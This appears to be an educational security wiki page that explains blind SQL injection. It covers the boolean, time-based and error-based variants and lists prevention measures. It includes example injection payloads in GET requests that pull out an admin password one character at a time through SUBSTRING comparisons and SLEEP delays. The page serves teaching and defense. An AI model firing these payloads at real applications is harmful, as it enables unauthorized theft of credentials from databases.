Blind SQL Injection

Blind SQL Injection occurs when an application is vulnerable to SQL injection but the results of the query are not returned in the response. Attackers must infer information by asking the database true/false questions or measuring response times.

How It Works

Since the attacker cannot see query results directly, they craft queries that cause observable differences in application behavior based on whether a condition is true or false. This allows extraction of data one bit or character at a time.

Types of Blind SQLi

• Boolean-based: Different responses for true/false conditions
• Time-based: Using delays (SLEEP, WAITFOR) to infer results
• Error-based: Forcing errors that reveal information

Example

Boolean-based blind SQLi to extract admin password:

// Check if first character of password is 'a'
GET /user?id=1 AND SUBSTRING(password,1,1)='a'

// If true: normal response (200 OK, content shown)
// If false: different response (empty, error)

// Iterate through characters to extract full password

Time-based blind SQLi:

// If first char is 'a', delay 5 seconds
GET /user?id=1 AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 0)

// Measure response time to determine if condition is true

Prevention

• Use parameterized queries (prepared statements)
• Same protections as regular SQL injection
• Implement rate limiting to slow extraction
• Use consistent error handling

PentesterLab Exercises

• From SQL Injection to Shell II

See Also

• SQL Injection
• Time-Based Blind SQL Injection
• Boolean-Based Blind SQL Injection